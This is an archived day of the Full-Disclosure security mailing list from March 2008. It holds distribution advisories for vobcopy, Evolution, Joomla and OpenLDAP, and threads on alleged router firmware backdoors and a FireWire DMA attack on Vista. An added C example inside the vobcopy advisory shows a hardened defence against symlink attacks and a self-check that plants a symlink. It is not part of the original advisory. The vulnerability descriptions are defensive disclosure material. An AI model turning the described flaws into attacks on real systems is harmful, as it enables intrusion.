[Full-disclosure] [ GLSA 200803-11 ] Vobcopy: Insecure temporary file creation

2008-03-05 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Vobcopy: Insecure temporary file creation
  Date: March 05, 2008
  Bugs: #197578
ID: 200803-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Vobcopy uses temporary files in an insecure manner, allowing for a
symlink attack.

Background
==

Vobcopy is a tool for decrypting and copying DVD .vob files to a hard
disk.

Affected packages
=

-------------------------------------------------------
 Package                  /  Vulnerable  /  Unaffected
-------------------------------------------------------
  1  media-video/vobcopy       < 1.1.0      >= 1.1.0

Description
===

Joey Hess reported that vobcopy appends data to the file
/tmp/vobcopy.bla in an insecure manner.

Impact
==

A local attacker could exploit this vulnerability to conduct symlink
attacks and append data to arbitrary files with the privileges of the
user running Vobcopy.
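An added example of the fix pattern for this bug class (not vobcopy's own code): an append-only open that refuses a planted symlink and verifies what it actually opened, plus a self-check that builds the constructed scenario in a private mkdtemp() directory. Only the file name vobcopy.bla comes from the advisory; everything else is assumed, and the code assumes Linux/POSIX semantics for O_NOFOLLOW and O_EXCL.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes, kept only as the "before": a fixed
   name in a world-writable directory opened with "a", which silently follows
   a symlink any local user may have planted there. (Illustration of the bug
   class, not vobcopy's actual source.) */
FILE *open_log_insecure(const char *path)
{
    return fopen(path, "a");
}

/* Hardened replacement: never follow a symlink at the final path component,
   create with O_EXCL the first time, and verify with fstat() that what was
   opened is a regular file with a single link owned by us. Returns an fd,
   or -1 with errno set. */
int open_log_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0 && errno == EEXIST)              /* existing file: reopen, still no-follow */
        fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check of the constructed scenario in a private mkdtemp() directory:
   a symlink named like the log and pointing at a victim file must be refused
   (ELOOP) and leave the victim untouched, while a genuine log file is
   created and appended to twice. Returns 0 on success, 1 on any failure. */
int symlink_refusal_selfcheck(void)
{
    char dir[] = "/tmp/vobcopy-check-XXXXXX";
    char victim[256], logp[256];
    struct stat st;
    int fd, rc = 1;
    if (!mkdtemp(dir))
        return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(logp, sizeof logp, "%s/vobcopy.bla", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) goto out;
    close(fd);

    /* Planted link: the hardened open must fail and the victim stay empty. */
    if (symlink(victim, logp) != 0) goto out;
    if (open_log_nofollow(logp) != -1 || errno != ELOOP) goto out;
    if (stat(victim, &st) != 0 || st.st_size != 0) goto out;
    unlink(logp);

    /* Genuine file: create, append, reopen, append again. */
    fd = open_log_nofollow(logp);
    if (fd < 0 || write(fd, "a", 1) != 1) goto out;
    close(fd);
    fd = open_log_nofollow(logp);
    if (fd < 0 || write(fd, "b", 1) != 1) goto out;
    close(fd);
    if (stat(logp, &st) != 0 || st.st_size != 2) goto out;
    rc = 0;
out:
    unlink(logp);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void)
{
    printf("symlink refusal self-check: %s\n",
           symlink_refusal_selfcheck() == 0 ? "ok" : "FAILED");
    return 0;
}
```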

Workaround
==

There is no known workaround at this time.

Resolution
==

All Vobcopy users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/vobcopy-1.1.0"

References
==

  [ 1 ] CVE-2007-5718
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5718

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200803-12 ] Evolution: Format string vulnerability

2008-03-05 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Evolution: Format string vulnerability
  Date: March 05, 2008
  Bugs: #212272
ID: 200803-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A format string error has been discovered in Evolution, possibly
resulting in the execution of arbitrary code.

Background
==

Evolution is a GNOME groupware application.

Affected packages
=

-------------------------------------------------------------
 Package                  /   Vulnerable   /  Unaffected
-------------------------------------------------------------
  1  mail-client/evolution    < 2.12.3-r1     >= 2.12.3-r1

Description
===

Ulf Harnhammar from Secunia Research discovered a format string error
in the emf_multipart_encrypted() function in the file mail/em-format.c
when reading certain data (e.g. the Version: field) from an encrypted
e-mail.

Impact
==

A remote attacker could entice a user to open a specially crafted
encrypted e-mail, potentially resulting in the execution of arbitrary
code with the privileges of the user running Evolution.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Evolution users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=mail-client/evolution-2.12.3-r1"

References
==

  [ 1 ] CVE-2008-0072
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ MDVSA-2008:060 ] - Updated Joomla! packages fix multiple vulnerabilities

2008-03-05 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:060
 http://www.mandriva.com/security/
 ___
 
 Package : joomla
 Date: March 5, 2008
 Affected: 2007.0, 2007.1, 2008.0
 ___
 
 Problem Description:
 
 Several severe security issues were discovered in the Joomla! PHP-based
 content management system.  These issues have been fixed in version
 1.0.15 which is provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6642
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6643
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6645
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Ivan .
http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html



[Full-disclosure] [USN-584-1] OpenLDAP vulnerabilities

2008-03-05 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-584-1 March 05, 2008
openldap2.2, openldap2.3 vulnerabilities
CVE-2007-6698, CVE-2008-0658
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  slapd   2.2.26-5ubuntu2.6

Ubuntu 6.10:
  slapd   2.2.26-5ubuntu3.3

Ubuntu 7.04:
  slapd   2.3.30-2ubuntu0.2

Ubuntu 7.10:
  slapd   2.3.35-1ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Jonathan Clarke discovered that the OpenLDAP slapd server did not
properly handle modify requests when using the Berkeley DB backend
and the NOOP control was used. An authenticated user with modify
permissions could send a crafted modify request and cause a denial
of service via application crash. Ubuntu 7.10 is not affected by
this issue. (CVE-2007-6698)

Ralf Haferkamp discovered that the OpenLDAP slapd server did not
properly handle modrdn requests when using the Berkeley DB backend
and the NOOP control was used. An authenticated user with modrdn
permissions could send a crafted modrdn request and possibly cause a
denial of service via application crash. (CVE-2007-6698)


Updated packages for Ubuntu 6.06 LTS:


Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread coderman
On Wed, Mar 5, 2008 at 3:09 PM, Ivan . [EMAIL PROTECTED] wrote:
 http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html

they also pwned my toothpaste and gave me diarrhea :( :( :(

H A C K E D B Y C H I N E S E, LOLOLOLOLOL

titan rain is dark comedy at its finest!

(( how many orgs / govs actually do due diligence and audit third
party hardware / software / systems they purchase ?? ))



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Ivan .
wouldn't be the first time that national intelligence agencies have
compromised IT gear

http://en.wikipedia.org/wiki/Crypto_AG




Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread coderman
On Wed, Mar 5, 2008 at 4:07 PM, Ivan . [EMAIL PROTECTED] wrote:
 wouldn't be the first time that National intelligence agencies have
  comprised IT gear

true; i just meant that an elaborate back door isn't even necessary
when the front door lock can be bumped open (titan rain :)

the athens affair is another fun example of the folly of running
arbitrary and untested / unaudited code on your infrastructure...

http://spectrum.ieee.org/print/5280



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread worried security

shut up coderman, this is actually a serious subject.

there was even a .mil report about it that i spammed to the list not
long back :)

no one paid attention though:

http://www.thetrumpet.com/index.php?q=4524.2780.0.0

http://www.govexec.com/story_page.cfm?articleid=38713&dcn=todaysnews

this is actually a serious subject i wanted securityfocus to cover but
they ignored my e-mails!
i also contacted cnet news at the time and they ignored my e-mails.

pay attention to the security community next time!

we're telling you things we want you to put in your news articles to
send signals to the government but you ignore us.

what's the point of this mailing list being here if the media won't
work with the underground to send messages to the high ups in our
corrupt governments?

fuck the media! :)

http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058845.html

http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058850.html

Date: Wed, 5 Dec 2007 08:33:09 +
From: n3td3v [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
Subject: Fwd: Report: Foreign Countries Develop U.S. Defense Systems Software

Please can you publish this, America deserves to know how stupid Bush admin
 are.

OK, we already knew how stupid they are, but please publish this cnet
and securityfocus editors, it's time to get the Bush admin and MI5 back
for spewing all that anti-China propaganda to the media recently.

Bush admin and MI5 are a bunch of incompetent bastards putting our
national security at risk, how dare they put national security at risk
by outsourcing its .mil software to the number 1 cyber enemy, CHINA.

The truth comes out in the end!!!

It's too LOL to be true.

PUBLISH PUBLISH PUBLISH!!! The American people deserve to know the
truth!!



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread quispiam lepidus
Typical media dramatization. Nowhere in the article does it state that
backdoors HAVE been found in router firmwares.

Next we'll be seeing Japanese tactical nukes Hidden in Toyota trunks






Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Larry Seltzer
Next we'll be seeing Japanese tactical nukes Hidden in Toyota
trunks

And who knows what the French are putting in that cheese.
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]


Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Times Enemy

Greets.

It does not matter so much if there is no hard proof about the router
firmware containing backdoors set in place by Chinese manufacturers.
From a security perspective, it is a potential threat which should be
addressed, especially for western networks and those they trust.

It is not too far fetched of an idea.  Google yielded the following
fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml

If you want to be inundated with reading material on the matter, be
creative, or not too creative, with Google searches having to do with
China and western powers and businesses, specific to information warfare.

.te




Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Ivan .
there is also the case of fake Cisco routers etc doing the rounds.
Whether these devices are backdoored is anyone's guess

http://news.zdnet.co.uk/communications/0,100085,39284348,00.htm

http://www.voipforyourbusiness.com/index.php?option=com_content&task=view&id=115&Itemid=1



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread quispiam lepidus
Why stop at routers & switches? You could own far more devices by
backdooring BIOSes, HDDs, etc, all of which are often produced in Far East
countries.


On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy [EMAIL PROTECTED] wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Greets.

 It does not matter so much if there is no hard proof about the router
 firmware containing backdoors set in place by Chinese manufacturers.
 ~From a security perspective, it is a potential threat which should be
 addressed, especially for western networks and those they trust.

 It is not too far fetched of an idea.  Google yielded the following
 fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml

 If you want to be inundated with reading material on the matter, be
 creative, or not too creative, with Google searches having to do with
 China and western powers and businesses, specific to information warfare.

 .te


 Larry Seltzer wrote:
 | Next we'll be seeing Japanese tactical nukes Hidden in Toyota
 | trunks
 |
 | And who knows what the French are putting in that cheese.
 | Larry Seltzer
 | eWEEK.com Security Center Editor
 | http://security.eweek.com/ http://security.eweek.com/
 | http://blogs.pcmag.com/securitywatch/
 | http://blogs.pcmag.com/securitywatch/
 | http://blogs.pcmag.com/securitywatch/Contributing
 | Contributing Editor, PC Magazine
 | [EMAIL PROTECTED]
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.8 (MingW32)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

 iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko
 a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ
 =RwKm
 -END PGP SIGNATURE-



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Ivan .
I dont think they have

http://www.hqlaptops.com/hard-drives/infected-seagate-hard-drives
http://www.taipeitimes.com/News/taiwan/archives/2007/11/11/2003387202

On Thu, Mar 6, 2008 at 1:28 PM, quispiam lepidus
[EMAIL PROTECTED] wrote:
 Why stop at routers & switches? You could own far more devices by
 backdooring BIOS', HDD's, etc, all of which are often produced in Far East
 countries.







Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Times Enemy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Greetings.

I agree, that the threat does not stop at firmware for routers and
switches.  Even with open source, or dare i type, even more so with open
source, the threat for maliciously modified code exists.  This is not a
new threat, per se, however, it is a growing threat which is fed by more
and more hardware being built/assembled/manufactured/what-have-you in
questionable countries/locations.

This is not isolated to the far east, though the far east is a perfectly
legitimate location for western users to NOT trust.  I would venture to
state that eastern users have already accepted that their products may
have gone 1984 on them.  It does not give me warm fuzzies that the way
the vast majority of production appears, at least one part of most
gizmos comes through the far east.

Without question, a security concern.

.te


quispiam lepidus wrote:
| Why stop at routers & switches? You could own far more devices by
| backdooring BIOS', HDD's, etc, all of which are often produced in Far East
| countries.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkfPXWkACgkQVuM8PD1UnspGaACeIRRRYubyJOSXuWSwQdoLyqlJ
A1EAnAtBAlGyGIXOMk3OyEcHhpRi+hdN
=jaFt
-END PGP SIGNATURE-



Re: [Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread TheM .
I believe their work is an expansion of this:
http://www.theage.com.au/news/security/hack-into-a-windows-pc-no-password-needed/2008/03/04/1204402423638.html,
which demonstrated the vuln. in XP (and, according to the paper, it's been
demonstrated with other OS's as well), and their work was specifically done
on showing the problem in Vista, which hadn't (as far as the paper writer
seems to know) been done before.

Maus

On Wed, Mar 5, 2008 at 4:30 PM, Roger A. Grimes [EMAIL PROTECTED]
wrote:

 As somewhat indicated in the paper itself, these types of physical DMA
 attacks are possible against any PC-based OS, not just Windows. If that's
 true, why is the paper titled around Windows Vista?

 I guess it makes headlines faster.  But isn't as important, if not more
 important, to say all PC-based systems have the same underlying problem?
  That it's a broader problem needing a broader solution, instead of picking
 on one OS vendor to get headlines?

 [Disclaimer: I'm a full-time Microsoft employee.]

 Roger

 *
 *Roger A. Grimes, InfoWorld, Security Columnist
 *CPA, CISSP, CISA, MCSE: Security (2000/2003), CEH, yada...yada...
 *email: [EMAIL PROTECTED] or [EMAIL PROTECTED]
 *Author of Windows Vista Security: Securing Vista Against Malicious
 Attacks (Wiley)
 *
 http://www.amazon.com/Windows-Vista-Security-Securing-Malicious/dp/0470101555
 *


 -Original Message-
 From: Bernhard Mueller [mailto:[EMAIL PROTECTED]
 Sent: Wednesday, March 05, 2008 10:54 AM
 To: Full Disclosure; Bugtraq
 Subject: Firewire Attack on Windows Vista

 Hello,

 In the light of recent discussions about firewire / DMA hacks, we would
 like to throw in some of the results of our past research on this topic
 (done mainly by Peter Panholzer) in the form of a short whitepaper. In this
 paper, we demonstrate that the firewire unlock attack (as implemented in
 Adam Boileau's winlockpwn) can be used against Windows Vista.

 The paper is available at:


 http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf


 Best regards,

 Bernhard


 --
 _

 Bernhard Mueller
 Security Consultant

 SEC Consult Unternehmensberatung GmbH
 www.sec-consult.com

 A-1190 Vienna, Mooslackengasse 17
 phone +43 1 8903043 34
 fax   +43 1 8903043 15
 mobile+43 676 840301 718
 email [EMAIL PROTECTED]

 Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

 Advisor for your information security.



[Full-disclosure] [SECURITY] [DSA 1512-1] New evolution packages fix arbitrary code execution

2008-03-05 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA-1512-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                          Thijs Kinkhorst
March 05, 2008                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: evolution
Vulnerability  : format string attack
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-0072

Ulf Härnhammar discovered that Evolution, the e-mail and groupware suite,
had a format string vulnerability in the parsing of encrypted mail messages.
If the user opened a specially crafted email message, code execution was
possible.

For the stable distribution (etch), this problem has been fixed in version
2.6.3-6etch2.

For the old stable distribution (sarge), this problem has been fixed in
version 2.0.4-2sarge3. Some architectures have not yet completed building
the updated package for sarge at this time, they will be added as they
come available.

For the unstable distribution (sid), this problem has been fixed in
version 2.12.3-1.1.

We recommend that you upgrade your evolution package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.diff.gz
    Size/MD5 checksum:   294256 892634ed1c28416dea721a0ee1374d84
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.dsc
    Size/MD5 checksum:     1459 e4a9b6f334108cae7550c9a0953e8e2b
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4.orig.tar.gz
    Size/MD5 checksum: 20968383 d555a0b1d56f0f0b9c33c35b057f73e6

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_amd64.deb
    Size/MD5 checksum:   160454 b6f68df817e14a3c52422e4f0e810bd3
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_amd64.deb
    Size/MD5 checksum: 10447584 94e37843d38106635045906d58bd9386

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_hppa.deb
    Size/MD5 checksum:   160482 947be2b50da1219d1cbcf9dab63b2280
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_hppa.deb
    Size/MD5 checksum: 10596054 be4f110f1d50077b53e013d2824cc1d4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_i386.deb
    Size/MD5 checksum:   160482 5b6f5d955d309e47fea09e97b24d7d58
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_i386.deb
    Size/MD5 checksum: 10228974 6c38e3e691756beccd1ccfdba259d2a8

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_ia64.deb
    Size/MD5 checksum: 11419604 c99bb84c7a074900400e59de2b10dcce
  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_ia64.deb
    Size/MD5 checksum:   160440 8887e35cc887febad15f9b6cf08694fe

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_powerpc.deb
    Size/MD5 checksum:   160488 6c9a8ba39a6bab1a47dd1da8e99a5205
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_powerpc.deb
    Size/MD5 checksum: 10286504 7f5d4b747a51e9c72d1114f9bcf6a209

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_s390.deb
    Size/MD5 checksum:   160438 a6e0c9b90c90b6815fd607899aeb7583
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_s390.deb
    Size/MD5 checksum: 10638988 f10525a9b20cc799c0e000c3e81738ab

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3.orig.tar.gz
    Size/MD5 checksum: 17176288 7af880364d53b18ba72b1f85f3813c81
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.dsc
    Size/MD5 checksum:     2269 25a2e18e12a838535c3fd74525696fa0
  http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.diff.gz
    Size/MD5 checksum:    37993 5f7815f2c6a24f3a0c940d773cca8fb1

Architecture independent packages:

  

Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Julio Cesar Fort
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Quoting PC Pro article: "SecureTest believes spyware could be easily
built into Asian-manufactured devices such as switches and routers,
providing a simple backdoor for companies or governments in the Far East
to listen in on communications."

It seems someone in this security company read "Breakpoint", by Richard
A. Clarke, stole his thoughts and is making claims without any proof
products were actually backdoored just to gain some media attention.

- --
Julio Cesar Fort
Recife, PE, Brazil
www.rfdslabs.com.br - computers, sex, human mind, music and more.

PGP public key: http://www.rootshell.be/~sandimas/juliocesarfort.gpg

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHz1W9ySo2QtzTl10RAiRSAJwNx65oWpGDRZ4sMazHm14wrM3/dgCeLzGt
Z0o6vSOdqbis9kLkM8Bce4s=
=cnbG
-END PGP SIGNATURE-



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Jerome Jar
Come on, where are the evidences? Sounds pretty much like racialism.

Usually the engineers are having a hard time on even getting the
routers and switches functional for mass market; there won't be any
time left for them to plant well hidden backdoors.

On Thu, Mar 6, 2008 at 7:09 AM, Ivan . [EMAIL PROTECTED] wrote:
 http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html





-- 
Houston, we have a problem.



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Valdis . Kletnieks
On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:
 Come on, where are the evidences? Sounds pretty much like racialism.
 
 Usually the engineers are having a hard time on even getting the
 routers and switches functional for mass market; there won't be any
 time left for them to plant well hidden backdoors.

But that's the proof right there - the reason *why* they have so much
trouble getting the damned things to work is because they have to work
around the backdoors in the device... ;)



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread J.A. Terranson

On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:

 Come on, where are the evidences? Sounds pretty much like racialism.

 Usually the engineers are having a hard time on even getting the
 routers and switches functional for mass market; there won't be any
 time left for them to plant well hidden backdoors.

 But that's the proof right there - the reason *why* they have so much
 trouble getting the damned things to work is because they have to work
 around the backdoors in the device... ;)

Before we blow this off with a good laugh we should all remember the back 
doors in other network gear.  Even so-called core equipment (anyone
remember the backdoor into the [Nortel] Shasta, later known as BSN 5000?)

Assuming that any unaudited gear has a backdoor is just common sense.


-- 
Yours,
J.A. Terranson
sysadmin_at_mfn.org
0xpgp_key_mgmt_is_broken-dont_bother

What religion, please tell me, tells you as a follower of that religion
to occupy another country and kill its people? Please tell me. Does
Christianity tell its followers to do that? Judaism, for that matter?
Islam, for that matter? What prophet tells you to send 160,000 troops
to another country, kill men, women, and children? You just can't wear
your religion on your sleeve or just go to church. You should be
truthfully religious.

Mahmoud Ahmadinejad



Re: [Full-disclosure] Chinese backdoors hidden in router firmware

2008-03-05 Thread Jerome Jar
OK, only if hidden backdoors are also part of their function specs...

I have friends in a router manufacturer. Besides basic functionalities
that a router must have, they usually have to deal with some
ridiculous requirements from customers. Mmmm, I also start to suspect
the customers *want* their backdoors ;-)

On Thu, Mar 6, 2008 at 12:28 PM,  [EMAIL PROTECTED] wrote:
 On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:
   Come on, where are the evidences? Sounds pretty much like racialism.
  
   Usually the engineers are having a hard time on even getting the
   routers and switches functional for mass market; there won't be any
   time left for them to plant well hidden backdoors.

  But that's the proof right there - the reason *why* they have so much
  trouble getting the damned things to work is because they have to work
  around the backdoors in the device... ;)




-- 
Houston, we have a problem.



Re: [Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread Daniel O'Connor
On Thu, 6 Mar 2008, Roger A. Grimes wrote:
 As somewhat indicated in the paper itself, these types of physical
 DMA attacks are possible against any PC-based OS, not just Windows.
 If that's true, why is the paper titled around Windows Vista?

 I guess it makes headlines faster.  But isn't as important, if not
 more important, to say all PC-based systems have the same underlying
 problem?  That it's a broader problem needing a broader solution,
 instead of picking on one OS vendor to get headlines?

Well, it IS a new kid on the block; other systems have already had this
problem reported. It would certainly be more interesting if Vista
wasn't vulnerable though :)

That said, according to the fwohci source in FreeBSD you have to
explicitly enable this feature and the fwohci man page says it is
mandatory for SBP. It would not be too difficult to disable it by
default unless an SBP device is in use. Even in that case it is
apparently possible to limit the access granted to a particular device
(eg only allow it for the places you expect the device to write to).

-- 
Daniel O'Connor software and network engineer
for Genesis Software - http://www.gsoft.com.au
The nice thing about standards is that there
are so many of them to choose from.
  -- Andrew Tanenbaum
GPG Fingerprint - 5596 B766 97C0 0E94 4347 295E E593 DC20 7B3F CE8C



Re: [Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread Peter Watkins
On Wed, Mar 05, 2008 at 04:30:35PM -0500, Roger A. Grimes wrote:
 As somewhat indicated in the paper itself, these types of physical DMA 
 attacks are possible against any PC-based OS, not just Windows. If that's 
 true, why is the paper titled around Windows Vista?
 
 I guess it makes headlines faster.  But isn't as important, if not more 
 important, to say all PC-based systems have the same underlying problem?  
 That it's a broader problem needing a broader solution, instead of picking on 
 one OS vendor to get headlines?

Roger, you should note that Adam's "Hit by a Bus" paper includes information
about how Linux users can load their OS' Firewire driver in a way that should
disallow physical memory DMA access, and close this attack vector. I have not
yet seen anyone explain how to do the same in Windows. If there is no such
option in Windows (as the Panholzer paper claims), then Microsoft deserves 
the negative attention.

 [Disclaimer: I'm a full-time Microsoft employee.] 

As for broader solutions, Microsoft is in an excellent position to help
improve the situation -- maybe you could shed some light on their efforts?

-Peter



Re: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2

2008-03-05 Thread David Judais
Why isn't there a patch?
